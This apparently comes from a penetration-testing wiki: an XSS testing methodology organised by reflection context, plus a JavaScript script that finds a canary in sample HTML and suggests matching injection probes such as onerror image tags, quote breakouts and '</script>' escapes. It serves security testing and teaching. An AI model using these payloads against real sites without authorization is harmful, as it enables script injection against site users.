# XSS

## General methodology

### **1. Identify Reflected Values**

* Check if any value you control is reflected in the HTML or used by JavaScript.
* The values you can control include:
  * **URL parameters**
  * **Path variables**
  * **Headers (if applicable)**
  * **Cookies**

### **2. Determine the Context of Reflection**

* Locate where your input is being reflected or used:
  * **Raw HTML**
  * **Inside an HTML tag**
  * **Inside JavaScript code**
  * **Inside a JavaScript function**

***

### **3. Exploitation Based on Context**

#### **A. If Reflected in Raw HTML**

* Can you **create new HTML tags**?
* Can you **inject JavaScript execution** using events or attributes (`onerror`, `onmouseover`, etc.)?
* Can you **bypass protection mechanisms** (e.g., WAF, filtering)?
* If a JavaScript framework (e.g., AngularJS, VueJS, Mavo) is in use, check for **Client-Side Template Injection (CSTI)**.
* If JavaScript execution is blocked, consider **Dangling Markup Injection** (HTML scriptless injection).

#### **B. If Reflected Inside an HTML Tag**

* Can you escape the attribute and inject raw HTML?
* Can you add new **events/attributes** that allow JavaScript execution?
* Does the attribute where you are trapped support **JavaScript execution** (`href="javascript:alert(1)"`)?
* Can you bypass existing security protections?

#### **C. If Reflected Inside JavaScript Code**

* Can you close the `<script>` block with `</script>` and inject new HTML? The HTML parser ends the script element at the first `</script>` it sees, even if your input sits inside a JavaScript string.
* Can you **break out of strings** (`"`, `'`, `` ` ``) and execute arbitrary JavaScript?
* Are you inside **template literals** (`` ` ` ``) where expressions (`${}`) can be evaluated?
* Can you bypass security protections?

#### **D. If Used in a JavaScript Function**

* Is the application calling a function where you can control **parameters**?
* Can you exploit a **DOM XSS**?
* Check if your input reaches a **sink** (e.g., `innerHTML`, `eval()`, `document.write()`).
* Can you control a function name (e.g., `?callback=alert(1)`) to execute arbitrary JavaScript?
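Steps 1 to 3 above are a single workflow: send a canary, find every place it comes back, work out the context of each reflection, and pick the probe that matches that context. The script below is an added example (not code from the original page) that automates that workflow against a response body. The HTML it scans is constructed for illustration, and the context detection is a heuristic built on quote and comment tracking, not a full HTML or JavaScript parser (regex literals and `>` inside attribute values, for example, are not handled).

```javascript
// Added example: classify every reflection of a canary in a response body
// and suggest the first probe for each context. Constructed sample input.
const CANARY = "zx9qa";

// Constructed response: one parameter reflected in several contexts.
const SAMPLE_HTML = `<html><body>
<!-- debug: zx9qa -->
<h1>Results for zx9qa</h1>
<a href="/search?q=zx9qa" title='zx9qa'>again</a>
<input value=zx9qa>
<script>
  var q = "zx9qa";
  track('zx9qa');
  var tpl = \`hello zx9qa\`;
  render(zx9qa);
</script>
</body></html>`;

// True when the last `open` before pos has not yet been followed by `close`.
function insideBlock(html, pos, open, close) {
  const before = html.slice(0, pos).toLowerCase();
  return before.lastIndexOf(open) > before.lastIndexOf(close);
}

// Walk a JavaScript fragment and report what is still open at its end:
// a string (with its delimiter), a comment (with its marker) or plain code.
// Backslash escapes inside strings are honoured.
function jsState(js) {
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (quote) {
      if (c === "\\") i++;                  // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === "`") {
      quote = c;
    } else if (c === "/" && js[i + 1] === "/") {
      const nl = js.indexOf("\n", i);
      if (nl === -1) return { kind: "comment", marker: "//" };
      i = nl;
    } else if (c === "/" && js[i + 1] === "*") {
      const end = js.indexOf("*/", i + 2);
      if (end === -1) return { kind: "comment", marker: "/*" };
      i = end + 1;
    }
  }
  return quote ? { kind: "string", quote } : { kind: "code" };
}

// Decide which of the methodology's contexts the reflection at `pos` is in.
function classify(html, pos) {
  if (insideBlock(html, pos, "<script", "</script")) {
    const open = html.toLowerCase().lastIndexOf("<script", pos);
    const body = html.slice(html.indexOf(">", open) + 1, pos);
    const s = jsState(body);
    if (s.kind === "string") return { context: "js-string", quote: s.quote };
    if (s.kind === "comment") return { context: "js-comment", marker: s.marker };
    return { context: "js-code" };
  }
  if (insideBlock(html, pos, "<!--", "-->")) return { context: "html-comment" };
  if (insideBlock(html, pos, "<", ">")) {
    const tagPrefix = html.slice(html.lastIndexOf("<", pos), pos);
    // attribute name, its quote character (or none) and the value text before the canary
    const m = /([A-Za-z_:][\w:.-]*)\s*=\s*(["']?)([^"']*)$/.exec(tagPrefix);
    if (!m) return { context: "tag" };
    return { context: "attribute", attr: m[1], quote: m[2], startsValue: m[3] === "" };
  }
  return { context: "html-text" };
}

// First probes to try for each context, in the order a tester would send them.
function suggestProbes(r) {
  const tag = "<img src=x onerror=alert(1)>";
  switch (r.context) {
    case "html-text":    return [tag];
    case "html-comment": return ["-->" + tag];
    case "tag":          return [" onmouseover=alert(1) "];
    case "attribute": {
      const probes = r.quote
        ? [r.quote + ">" + tag, r.quote + " onmouseover=alert(1) " + r.quote]
        : [" onmouseover=alert(1) "];
      // javascript: only helps when the canary is the start of an href value
      if (r.attr.toLowerCase() === "href" && r.startsValue) probes.unshift("javascript:alert(1)");
      return probes;
    }
    case "js-string":
      return r.quote === "`"
        ? ["${alert(1)}", "`;alert(1)//", "</script>" + tag]
        : [r.quote + ";alert(1)//", "</script>" + tag];
    case "js-comment":
      return [r.marker === "//" ? "\nalert(1)//" : "*/alert(1)/*", "</script>" + tag];
    default:             return ["alert(1)", "</script>" + tag];
  }
}

// Find every reflection of the canary and annotate it with context and probes.
function findReflections(html, canary) {
  const hits = [];
  for (let pos = html.indexOf(canary); pos !== -1; pos = html.indexOf(canary, pos + canary.length)) {
    const r = classify(html, pos);
    r.line = html.slice(0, pos).split("\n").length;
    r.probes = suggestProbes(r);
    hits.push(r);
  }
  return hits;
}

for (const h of findReflections(SAMPLE_HTML, CANARY)) {
  console.log(`line ${h.line}: ${h.context}${h.attr ? " " + h.attr : ""}` +
    `${h.quote !== undefined ? " quote=" + JSON.stringify(h.quote) : ""} -> try ${JSON.stringify(h.probes[0])}`);
}
```

Run it with `node` and it lists nine reflections: an HTML comment, raw text, three attributes (double-quoted, single-quoted and unquoted), three JavaScript strings (including a template literal, where `${alert(1)}` is the first thing to try) and bare JavaScript code. Every `<script>` context also gets `</script>` followed by a tag as a fallback, because the HTML parser closes the script element regardless of the JavaScript string state.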
